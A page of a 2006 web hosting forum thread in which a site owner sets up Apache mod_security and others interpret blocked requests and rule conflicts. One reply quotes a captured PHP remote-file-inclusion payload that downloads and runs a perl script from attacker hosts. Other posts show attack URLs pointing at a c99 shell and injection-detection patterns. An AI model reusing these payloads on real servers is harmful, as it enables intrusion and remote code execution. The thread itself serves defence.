Page 2 of 2 FirstFirst 12
Results 26 to 36 of 36
  1. #26
    Join Date
    May 2003
    Location
    Florida
    Posts
    902
    Quote Originally Posted by The Blind Can See
    Thanks for the responses.

    Here is what I did.

    I added "include.." in httpd.conf and created their respective files

    I added eth0's set, plus rules.conf and rookits.conf from gotroot
    http://www.gotroot.com/downloads/ftp/mod_security/


    Does this look ok?
    Looks like it is working already. The second one (serverPath=http://trendpresent.de/images/root.txt) appears to be trying to gain access to the server. Here is what it is trying to do:
    Code:
    <?
     passthru('cd /tmp;wget http://trendpresent.de/sh;perl sh;rm -f *');
     passthru('cd /tmp;curl -O http://trendpresent.de/sh;perl sh;rm -f *');
     passthru('cd /tmp;lwp-download http://trendpresent.de/sh;perl sh.txt;rm -f *');
     passthru('cd /tmp;lynx -source ttp://trendpresent.de/sh >sh;perl sh;rm -f *');
     passthru('cd /tmp;fetch ttp://trendpresent.de/sht >sh;perl sh;rm -f *');
     passthru('cd /tmp;GET ttp://trendpresent.de/sh >sh;perl sh;rm -f *');
    
     passthru('cd /dev/shm;wget http://trendpresent.de/sh;perl sh;rm -f *');
     passthru('cd /dev/shm;curl -O http://trendpresent.de/sh;perl sh;rm -f *');
     passthru('cd /dev/shm;lwp-download http://trendpresent.de/sh;perl sh.txt;rm -f *');
     passthru('cd /dev/shm;lynx -source http://home.arcor.de/pwnz/sh >sh;perl sh;rm -f *');
     passthru('cd /dev/shm;fetch http://home.arcor.de/pwnz/sh >sh;perl sh;rm -f *');
     passthru('cd /dev/shm;GET http://home.arcor.de/pwnz/sh >sh;perl sh;rm -f *');
    
     passthru('cd /var/tmp;wget http://trendpresent.de/sh;perl sh;rm -f *');
     passthru('cd /var/tmp;curl -O http://trendpresent.de/sh;perl sh;rm -f *');
     passthru('cd /var/tmp;lwp-download http://trendpresent.de/sh;perl sh.txt;rm -f *');
     passthru('cd /var/tmp;lynx -source http://home.arcor.de/pwnz/sh >sh;perl sh;rm -f *');
     passthru('cd /var/tmp;fetch http://home.arcor.de/pwnz/sh >sh;perl sh;rm -f *');
     passthru('cd /var/tmp;GET http://home.arcor.de/pwnz/sh >sh;perl sh;rm -f *');
     ?>
    I suggest you consider disabling some functions in php.ini (like passthru) unless you really need them on.

  2. #27
    Thanks for the info...here's a question...where did you get these logs from? I didn't post that

  3. #28
    Here is more...


    One is for my forum, gives 403 when attempting to save updated vbulletin template
    Attached Files Attached Files
    Last edited by The Blind Can See; 09-10-2006 at 02:57 PM.

  4. #29
    Join Date
    May 2003
    Location
    Florida
    Posts
    902
    Quote Originally Posted by The Blind Can See
    Thanks for the info...here's a question...where did you get these logs from? I didn't post that
    Actually I got it from your post where you gave what was in the audit_log. Your second entry was:
    ==23bb7470==============================
    Request: www.hosteddomain.com 70.87.119.68 - - [10/Sep/2006:13:12:32 -0500] "GET /forum//calendar/setup/header.inc.php?serverPath=http://trendpresent.de/images/root.txt? HTTP/1.1" 403 437 "-" "libwww-perl/5.805" - "-"
    ----------------------------------------
    GET /forum//calendar/setup/header.inc.php?serverPath=http://trendpresent.de/images/root.txt? HTTP/1.1
    Connection: TE, close
    Host: www.hosteddomain.com
    TE: deflate,gzip;q=0.3
    User-Agent: libwww-perl/5.805
    mod_security-action: 403
    mod_security-message: Access denied with code 403. Pattern match "\\.php(3|4|5)?(\\?|&).*=(ht|f)tps?:/.*(\\?|&)" at REQUEST_URI [id "300018"][rev "1"] [msg "Generic PHP code injection protection"] [severity "CRITICAL"]
    I looked at the line at the top that starts with "GET". If you check, it shows the link that was being called. It was: serverPath=http://trendpresent.de/images/root.txt

    If you check that link, it is what I posted.

  5. #30
    Join Date
    May 2003
    Location
    Florida
    Posts
    902
    Quote Originally Posted by The Blind Can See
    Here is more...


    One is for my forum, gives 403 when attempting to save updated vbulletin template
    Your server is pretty busy protecting you. Good think you have mod_security installed. Here is another hacker trying to get in - that was stopped:
    GET /chat/inc/cmses/aedatingCMS.php?dir[inc]=http://www.sylviawebster.f2s.com/mmf/extWiki//htdocs/files/c99shell_r16.txt

    I imagine the rule stopping your update is the one with alter|create|drop in it. You can either turn that rule off, allow it for your site only, or turn it off only when you need to update the theme.

  6. #31
    Thanks..... that is the same line that gave me the 403 in my site

    Code:
    #Generic SQL sigs
    SecFilterSelective ARGS "((alter|create|drop)[[:space:]]+(column|database|procedure|table)|delete[[:space:]]+from|update.+set.+=)" "id:300015,rev:1,severity:2,msg:'Generic SQL injection protection'"
    how do I disable it for one site?

  7. #32
    By the way, anyone have a remedy for losers who have nothing better to do than to attempt to hack others all day long?


  8. #33
    Join Date
    May 2003
    Location
    Florida
    Posts
    902
    Quote Originally Posted by The Blind Can See
    By the way, anyone have a remedy for losers who have nothing better to do than to attempt to hack others all day long?

    Not really much you can do. One thing I have seen done is to change the line:
    SecFilterDefaultAction "deny,log,status:403"

    To something like:
    SecFilterDefaultAction "deny,log,redirect:http://www.google.com"

    This would redirect them to google instead of your site. I guess you could also direct them somebody better. Won't stop them.


    It would be good if somebody would write a mod_security rule that adds them to the firewall deny.

  9. #34
    Join Date
    May 2003
    Location
    behind your business
    Posts
    70
    Quote Originally Posted by The Blind Can See
    Thanks..... that is the same line that gave me the 403 in my site

    Code:
    #Generic SQL sigs
    SecFilterSelective ARGS "((alter|create|drop)[[:space:]]+(column|database|procedure|table)|delete[[:space:]]+from|update.+set.+=)" "id:300015,rev:1,severity:2,msg:'Generic SQL injection protection'"
    how do I disable it for one site?
    Add in httpd.conf under his VirtualHost

    <VirtualHost IP:80>
    .
    .
    SecFilterRemove 300015
    .
    </VirtualHost>

    -asc2000-

  10. #35
    I'll try that..here's another problem. Cannot publish through frontpage (oddly, it worked a few times and suddenly stopped, AFTER the rules were already applied)

    apache log:

    [Sun Sep 10 21:02:57 2006] [error] [client xx.xx.xx] mod_security: Access denied with code 403. Pattern match "(((URL|SRC|HREF|LOWSRC)[\\\\s]*=)|(url[\\\\s]*[\\\\(]))[\\\\s]*[\\\\'\\"]*[\\\\x09\\\\x0a\\\\x0b\\\\x0c\\\\x0d]*j[\\\\x09\\\\x0a\\\\x0b\\\\x0c\\\\x0d]*a[\\\\x09\\\\x0a\\\\x0b\\\\x0c\\\\x0d]*v[\\\\x09\\\\x0a\\\\x0b\\\\x0c\\\\x0d]*a[\\\\x09\\\\x0a\\\\x0b\\\\x0c\\\\x0d]*s[\\\\x09\\\\x0a\\\\x0b\\\\x0c\\\\x0d]*c[\\\\x09\\\\x0a\\\\x0b\\\\x0c\\\\x0d]*r[\\\\x09\\\\x0a\\\\x0b\\\\x0c\\\\x0d]*i[\\\\x09\\\\x0a\\\\x0b\\\\x0c\\\\x0d]*p[\\\\x09\\\\x0a\\\\x0b\\\\x0c\\\\x0d]*t[\\\\x09\\\\x0a\\\\x0b\\\\x0c\\\\x0d]*[\\\\:]" at POST_PAYLOAD [hostname "mydomain.com"] [uri "/_vti_bin/_vti_aut/author.exe"]

    I removed these two from modsec.conf

    SecFilterSelective POST_PAYLOAD "cc:"
    SecFilterSelective POST_PAYLOAD "cc:\x20"

    Still doesn't publish (403 error)

    I even added this

    ###########################################
    #Front page exclusions
    ###########################################
    < LocationMatch "/_vti_bin/_vti_aut/author.exe" >
    SecFilterInheritance Off
    < /LocationMatch >

    Caused apache to fail

  11. #36
    The line causing the 403 is

    Code:
    SecFilter "(((URL|SRC|HREF|LOWSRC)[\s]*=)|(url[\s]*[\(]))[\s]*[\'\"]*[\x09\x0a\x0b\x0c\x0d]*j[\x09\x0a\x0b\x0c\x0d]*a[\x09\x0a\x0b\x0c\x0d]*v[\x09\x0a\x0b\x0c\x0d]*a[\x09\x0a\x0b\x0c\x0d]*s[\x09\x0a\x0b\x0c\x0d]*c[\x09\x0a\x0b\x0c\x0d]*r[\x09\x0a\x0b\x0c\x0d]*i[\x09\x0a\x0b\x0c\x0d]*p[\x09\x0a\x0b\x0c\x0d]*t[\x09\x0a\x0b\x0c\x0d]*[\:]"
    I would like to keep it there and add some sort of frontpage exception that will work. Please help

Page 2 of 2 FirstFirst 12

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •